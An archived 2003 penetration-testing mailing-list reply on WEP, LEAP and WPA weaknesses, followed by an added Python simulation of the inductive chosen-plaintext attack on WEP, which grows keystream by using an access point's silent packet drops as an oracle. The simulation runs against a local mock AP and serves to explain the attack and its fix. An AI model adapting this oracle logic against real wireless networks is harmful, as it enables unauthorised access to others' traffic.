Penetration Testing mailing list archives
Re: Wireless Pent-Test
From: Michael Sierchio <kudzu () tenebras com>
Date: Mon, 06 Oct 2003 16:53:34 -0700
R. DuFresne wrote:
there was an FD posting last week that indicated that Cisco's LEAP was also insecure and borked. The thing is, a wireless LAN should be considered untrustworthy, or at least untrusted, all traffic into the wired net has to be tunneled and safely wrapped in encryption, and there has to be a better auth mech to allow the tunnel access than what is provided in simple AP/laptop setups. Network Mag had some interesting articles lately, one in July mentioning some newer AP gateway systems coming into play, but, they are not cheap, and not for small to medium biz folks. Our impression, and mirrored by Lawrence Livermore, wireless is not ready for prime time play.
WPA is probably ready for prime time -- it solved the WEP vulnerabilities without introducing new ones (as LEAP did).

The problem with LEAP is that the IV space was effectively reduced to the point where the Inductive Chosen-Plaintext Attack became trivially easy. This allows complete use of the access without ever recovering the WEP key. Fluhrer-Mantin-Shamir won't work if the key isn't weak. The major difference is that the inductive attack is an active attack which uses the AP as an oracle, but decryption errors aren't ever reported to the upper layers anyway -- they're just silently dropped.

WPA was a solution with a strict set of constraints -- mostly the 25-33MHz ARM or 486-equiv processors in the existing APs.

Even in the most grandiose of IEEE schemes, management frames aren't encrypted, so there's lots of fun to be had.

--
"Well," Brahma said, "even after ten thousand explanations, a fool is no wiser, but an intelligent man requires only two thousand five hundred."
- The Mahabharata
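The inductive chosen-plaintext attack Michael refers to is easiest to understand in code. The following is an added example for this archive page, not code from any poster or vendor: it simulates WEP (RC4 keyed with IV || secret, CRC-32 ICV) and an access point that checks the ICV and silently drops failures, then grows a short known keystream one byte per round by using the AP's accept/drop behaviour as the oracle. The 13-byte secret, the 3-byte IV, the LLC/SNAP known-plaintext header and the packet sizes are all constructed for the demonstration. No WEP key is ever recovered; only keystream for the chosen IV, which is all that is needed to inject and read traffic under that IV.

```python
"""Inductive chosen-plaintext attack on WEP, simulated end to end.

Added example: the key, IV and frames below are constructed for the demo.
"""
import zlib

SECRET = bytes.fromhex("0102030405060708090a0b0c0d")   # constructed WEP-104 secret
IV = b"\x11\x22\x33"                                   # constructed 24-bit IV
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")        # known plaintext of any IPv4 frame


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP keys it with IV || secret."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return (zlib.crc32(data) & 0xFFFFFFFF).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV||secret) XOR (plaintext || ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + secret, len(body)))


class AccessPoint:
    """The oracle. forward() is True only when the ICV checks out; a bad ICV is
    dropped with no error to upper layers, exactly as the message describes.
    An attacker sees the result indirectly (relayed broadcast, ping reply)."""

    def __init__(self, secret: bytes):
        self.secret = secret

    def forward(self, frame: bytes) -> bool:
        iv, body = frame[:3], frame[3:]
        plain = xor(body, rc4_keystream(iv + self.secret, len(body)))
        return len(plain) >= 4 and icv(plain[:-4]) == plain[-4:]


def extend_keystream(ap: AccessPoint, iv: bytes, known: bytes, target_len: int) -> bytes:
    """Grow n known keystream bytes to target_len using the AP as an oracle.

    Each round: pick an (n-3)-byte message so that message||ICV is n+1 bytes.
    The first n bytes encrypt correctly under the known keystream; the last
    ciphertext byte is guessed (256 tries). Only the right guess yields a valid
    ICV and is forwarded, and it reveals keystream byte n+1.
    """
    ks = bytearray(known)
    while len(ks) < target_len:
        n = len(ks)
        msg = b"\x41" * (n - 3)                 # attacker-chosen plaintext
        body = msg + icv(msg)                   # n + 1 bytes
        prefix = xor(body[:n], ks)              # valid ciphertext for the known part
        for guess in range(256):
            if ap.forward(iv + prefix + bytes([guess])):
                ks.append(guess ^ body[n])      # accepted: keystream[n] = C[n] ^ P[n]
                break
        else:
            raise RuntimeError("oracle never accepted: known keystream prefix is wrong")
    return bytes(ks)


def demo(target_len: int = 64) -> dict:
    """Sniff one IPv4 frame, derive 8 keystream bytes from its LLC/SNAP header,
    then extend to target_len bytes without touching the secret."""
    ap = AccessPoint(SECRET)
    victim_frame = wep_encrypt(SECRET, IV, LLC_SNAP_IP + b"\x45\x00" + b"\x00" * 30)
    known = xor(victim_frame[3:3 + len(LLC_SNAP_IP)], LLC_SNAP_IP)
    recovered = extend_keystream(ap, IV, known, target_len)
    actual = rc4_keystream(IV + SECRET, target_len)
    return {"recovered": recovered, "actual": actual, "match": recovered == actual}


if __name__ == "__main__":
    result = demo()
    print("keystream bytes recovered:", len(result["recovered"]), "match:", result["match"])
```

Each extra keystream byte costs at most 256 injected frames, so reaching a full 1500-byte MTU for one IV is on the order of a few hundred thousand frames; the key itself is never needed, which is why a key that resists Fluhrer-Mantin-Shamir does nothing against this. The only defence at the WEP layer is a real message integrity code instead of a linear CRC, which is what TKIP's Michael and CCMP's CBC-MAC add.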
Current thread:
- Wireless Pent-Test Cesar Diaz (Oct 06)
- Re: Wireless Pent-Test Daniel Nylander (Oct 06)
- Re: Wireless Pent-Test Matthew Leeds (Oct 06)
- Re: Wireless Pent-Test R. DuFresne (Oct 06)
- Re: Wireless Pent-Test Gregory Spath (Oct 06)
- Re: Wireless Pent-Test Seth Fogie (Oct 06)
- Re: Wireless Pent-Test Michael Sierchio (Oct 07)
- RE: Wireless Pent-Test Christopher Harrington (Oct 06)
- Re: Wireless Pent-Test Raistlin (Oct 07)
- Re: Wireless Pent-Test Cedric Blancher (Oct 08)
- Re: Wireless Pent-Test Raistlin (Oct 08)
- Re: Wireless Pent-Test Matthew Leeds (Oct 06)
- Re: Wireless Pent-Test Daniel Nylander (Oct 06)
- Re: Wireless Pent-Test n0g0013 (Oct 07)
- Re: Wireless Pent-Test goat (Oct 06)
- <Possible follow-ups>
- RE: Wireless Pent-Test Artes, Francisco (Oct 06)